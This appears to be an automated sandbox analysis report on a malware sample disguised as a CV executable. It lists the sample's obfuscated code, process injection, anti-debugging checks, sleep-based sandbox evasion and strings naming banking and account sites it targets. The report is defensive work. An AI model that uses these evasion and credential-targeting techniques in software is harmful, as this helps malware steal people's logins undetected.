Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, qy5p5LUNIfQKmew1rq.cs	High entropy of concatenated method names: 'UXE7RO8d2c', 'A3g7sRQ1Or', 'S1P7SidSsw', 'x5i7G0e7Xm', 'dGl70x1nRS', 'ndYSQ22rrc', 'LsDS9b0BKH', 'XnYSTmQfMO', 'YPISwKqnLn', 'ztTS2vOWpw'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, qy1pqrEQ3sOEpt1qlE.cs	High entropy of concatenated method names: 'B3hyGxYXTB', 'xl3y0LAaaT', 'ATnyHXA1Nq', 'U4lyecSKVR', 'TlEyqCg8y5', 'S5LyONIfQK', 'KxOSUlpr0nrZV1sMRG', 'y85Ev9KhoPIn0pGxYK', 'aNuyyayrWo', 'LqwyIVfEmw'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, MJyjJtbGp98wUACFmA.cs	High entropy of concatenated method names: 'AM9GJmwIui', 'bc0GiIMXIQ', 'rNgGWrYPop', 'eZIG1DWdDp', 'udIGKVlbnD', 'Jw5GZFwG0r', 'zE5GoYbYhG', 'E5TGPKTFZX', 'GQXGN0n35L', 'kkxGmgZvdf'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, UvteRy33KIyyiyhRJn.cs	High entropy of concatenated method names: 'r75fH9rJNN', 'ugsfeYPthf', 'ToString', 'mfrfaMc9aR', 'iGSfsce0uN', 'WxXfDSBndn', 'K1afSF3Qli', 'NgZf71WTmu', 'shHfG2XTkI', 'jAYf0Oaejm'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, FAn5GI9Cb4yvKhVofj.cs	High entropy of concatenated method names: 'OyWfwDcRQ5', 'rbmf4djM1O', 'KW38rvDUlg', 'ANM8ysFOTl', 'G84fhD97tn', 'JMZfBZh3YQ', 'RwNfVcexTW', 'iFkfnjRgEy', 'TbKfumM9D0', 'otsfppi0Ab'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, nr5UVF4misg4mgdUAT.cs	High entropy of concatenated method names: 'hf6LyS7T2Z', 'OGKLImP2eA', 'JKALEiY1jx', 'b3wLaj6bU7', 'nAwLshJicE', 'An5LShjABT', 'yBfL73trGI', 'qpN8T93O82', 'Hyg8wjPDgr', 'eay82UlxUR'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, J9gH0fkhRdxeGx8H0l.cs	High entropy of concatenated method names: 'wl8Ga3f4fx', 'fGVGDOrcwj', 'RuWG75cpIu', 'VNL74GxkhL', 'Mxm7zgTx0n', 'BQMGrAB1kI', 'v38GyWqnT4', 'yO0Gdpdd4M', 'QEPGIrhFrN', 'Q92GEetj1b'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, iKVRBkmAjnMyg3lECg.cs	High entropy of concatenated method names: 'WHZSKv33HH', 'rxmSoHL0pR', 'v0QD6WdPPO', 'S1oDjUJGvo', 'K5DDvq62xJ', 'AChDMsHPNu', 'rACDk0wbhs', 'gH3Dx9wCp2', 'nO4DbEXWU3', 'XHdDCS2cjw'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, BRrrodyIpfJ2i78iZBd.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Hn0ln9m4HA', 'SotluUO4Cl', 'qp8lpSAfZx', 'eQal3diHfl', 'CADlQjkRdJ', 'JYml9gGv0N', 'yAAlTdUp1W'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, OQYqIHzI2WrTnxnHF2.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RMULF0mU4s', 'A34LqTvXiH', 'fLVLOIZS3R', 'mTHLfVCpC7', 't4HL8opncR', 'urCLLmLqBE', 'YBWLlN1u43'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, BMWTCqVkjukBjFQf7X.cs	High entropy of concatenated method names: 'do4FPvEYXY', 'MT1FNbX2Pa', 'CSdFUaD4VR', 'NwcFc5oLr6', 'LmdFjsXHjo', 'LQaFv354TU', 'vusFkleL2G', 'FIAFxqycP6', 'pYlFCP0xcd', 'beDFhOsONA'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, OxYXTBPtl3LAaaTJsD.cs	High entropy of concatenated method names: 'qiEsnNLmos', 'OUjsuFLZuX', 'b16spA17UN', 'bE9s3a0CBS', 'xxssQgf7aa', 'mkqs9BL4Bu', 'qPasT3T539', 'UGlswgNXJb', 'hKAs2aCofv', 'uUYs4UVpW8'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, pwXeAKdFbkBqalm4Og.cs	High entropy of concatenated method names: 'rqKWmOsK6', 'upE1ygRjY', 'jDoZBVfO4', 'KuEoNuI4J', 'rlSNHXgf0', 'fShmaoHPl', 'KGcATmuYCWNneoNnPo', 'k7bkS21gHyNXXJB4kF', 'n6C8vaNZP', 'X2alTMvUf'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Qas3xdyra6RNyrO1vfP.cs	High entropy of concatenated method names: 'DjgLJokA79', 'KAFLiZAiJF', 'NlZLWidMy4', 'zxRL1vKMm4', 'H6oLKUm9Wg', 'x0jLZbMEhB', 'G5yLoBFpQ7', 'vtDLPH3bPm', 'rFALN0Q1MV', 'KUGLmZG6lC'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, i9NUHTnq1v8MTGavnG.cs	High entropy of concatenated method names: 'pZtqCRU0PN', 'r3DqBR737p', 'iHFqnn1uBt', 'lrMquytBk2', 'PejqcV4wIQ', 'w7Lq64LmAp', 'Bu4qj9yT6R', 'Bt2qvqpkk8', 'VfWqMFTyUL', 'hH1qkDao7f'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Hpb6sX0m5OuPGE34GK.cs	High entropy of concatenated method names: 's7KIR3bgyQ', 'fYXIacOyoF', 'HjfIst1RPh', 'mFEIDHBaiC', 'kF1ISjR86X', 'yGlI7QU7V0', 'uTcIGuKmkg', 'A1nI0jJwwf', 'K5PIYIRLvH', 'IiAIHOK4Cd'
Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, DvFq1CsmOfeYK5xheQ.cs	High entropy of concatenated method names: 'Dispose', 'HRNy2iNtIV', 'PWjdcZemIV', 'N1o55Jw110', 'QJKy4Q2Y9R', 'USIyzgGWTN', 'ProcessDialogKey', 'qRadrqlC8u', 'B7YdyhPRjb', 'avXdder5UV'

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: Yara match

File source: Process Memory Space: Curriculum Vitae Catalina Munoz.exe PID: 4048, type: MEMORYSTR

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Memory allocated: 2BE0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Memory allocated: 2DF0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Memory allocated: 2BE0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Memory allocated: 9000000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Memory allocated: A000000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Memory allocated: A210000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Memory allocated: B210000 memory reserve | memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe

Code function: 2_2_0153096E rdtsc

2_2_0153096E

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 240000			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 239875			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 239765			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 239656			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 239547			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 239437			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 239328			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 239173			Jump to behavior

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Window / User API: threadDelayed 578			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Window / User API: threadDelayed 614			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Window / User API: threadDelayed 9813			Jump to behavior

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\TSTheme.exe	API coverage: 2.8 %

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108	Thread sleep time: -7378697629483816s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 6216	Thread sleep count: 578 > 30			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108	Thread sleep time: -239875s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 6216	Thread sleep count: 614 > 30			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108	Thread sleep time: -239765s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108	Thread sleep time: -239656s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108	Thread sleep time: -239547s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108	Thread sleep time: -239437s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108	Thread sleep time: -239328s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108	Thread sleep time: -239173s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe TID: 7548	Thread sleep count: 158 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe TID: 7548	Thread sleep time: -316000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe TID: 7548	Thread sleep count: 9813 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe TID: 7548	Thread sleep time: -19626000s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe TID: 7604	Thread sleep time: -75000s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe TID: 7604	Thread sleep count: 39 > 30			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe TID: 7604	Thread sleep time: -58500s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe TID: 7604	Thread sleep count: 41 > 30			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe TID: 7604	Thread sleep time: -41000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\TSTheme.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\TSTheme.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\TSTheme.exe

Code function: 15_2_02FDBE90 FindFirstFileW,FindNextFileW,FindClose,

15_2_02FDBE90

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 240000			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 239875			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 239765			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 239656			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 239547			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 239437			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 239328			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Thread delayed: delay time: 239173			Jump to behavior

Source: 63u1Q-P.15.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 63u1Q-P.15.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 63u1Q-P.15.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 63u1Q-P.15.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 63u1Q-P.15.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 63u1Q-P.15.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 63u1Q-P.15.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 63u1Q-P.15.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: 63u1Q-P.15.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 63u1Q-P.15.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 63u1Q-P.15.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 63u1Q-P.15.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 63u1Q-P.15.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 63u1Q-P.15.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 63u1Q-P.15.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 63u1Q-P.15.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: firefox.exe, 00000012.00000002.1765095376.000001EDF2BFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 63u1Q-P.15.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3661826954.000000000061F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: 63u1Q-P.15.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 63u1Q-P.15.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 63u1Q-P.15.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 63u1Q-P.15.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 63u1Q-P.15.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 63u1Q-P.15.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 63u1Q-P.15.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 63u1Q-P.15.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 63u1Q-P.15.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 63u1Q-P.15.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 63u1Q-P.15.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 63u1Q-P.15.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: 63u1Q-P.15.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 63u1Q-P.15.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw%R[

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe

Code function: 2_2_0153096E rdtsc

2_2_0153096E

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe

Code function: 2_2_004177F3 LdrLoadDll,

2_2_004177F3

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01588158 mov eax, dword ptr fs:[00000030h]		2_2_01588158
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014EC156 mov eax, dword ptr fs:[00000030h]		2_2_014EC156
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F6154 mov eax, dword ptr fs:[00000030h]		2_2_014F6154
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F6154 mov eax, dword ptr fs:[00000030h]		2_2_014F6154
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01584144 mov eax, dword ptr fs:[00000030h]		2_2_01584144
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01584144 mov eax, dword ptr fs:[00000030h]		2_2_01584144
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01584144 mov ecx, dword ptr fs:[00000030h]		2_2_01584144
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01584144 mov eax, dword ptr fs:[00000030h]		2_2_01584144
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01584144 mov eax, dword ptr fs:[00000030h]		2_2_01584144
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015C4164 mov eax, dword ptr fs:[00000030h]		2_2_015C4164
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015C4164 mov eax, dword ptr fs:[00000030h]		2_2_015C4164
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159A118 mov ecx, dword ptr fs:[00000030h]		2_2_0159A118
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159A118 mov eax, dword ptr fs:[00000030h]		2_2_0159A118
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159A118 mov eax, dword ptr fs:[00000030h]		2_2_0159A118
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159A118 mov eax, dword ptr fs:[00000030h]		2_2_0159A118
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015B0115 mov eax, dword ptr fs:[00000030h]		2_2_015B0115
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159E10E mov eax, dword ptr fs:[00000030h]		2_2_0159E10E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159E10E mov ecx, dword ptr fs:[00000030h]		2_2_0159E10E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159E10E mov eax, dword ptr fs:[00000030h]		2_2_0159E10E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159E10E mov eax, dword ptr fs:[00000030h]		2_2_0159E10E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159E10E mov ecx, dword ptr fs:[00000030h]		2_2_0159E10E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159E10E mov eax, dword ptr fs:[00000030h]		2_2_0159E10E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159E10E mov eax, dword ptr fs:[00000030h]		2_2_0159E10E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159E10E mov ecx, dword ptr fs:[00000030h]		2_2_0159E10E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159E10E mov eax, dword ptr fs:[00000030h]		2_2_0159E10E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159E10E mov ecx, dword ptr fs:[00000030h]		2_2_0159E10E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01520124 mov eax, dword ptr fs:[00000030h]		2_2_01520124
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156E1D0 mov eax, dword ptr fs:[00000030h]		2_2_0156E1D0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156E1D0 mov eax, dword ptr fs:[00000030h]		2_2_0156E1D0
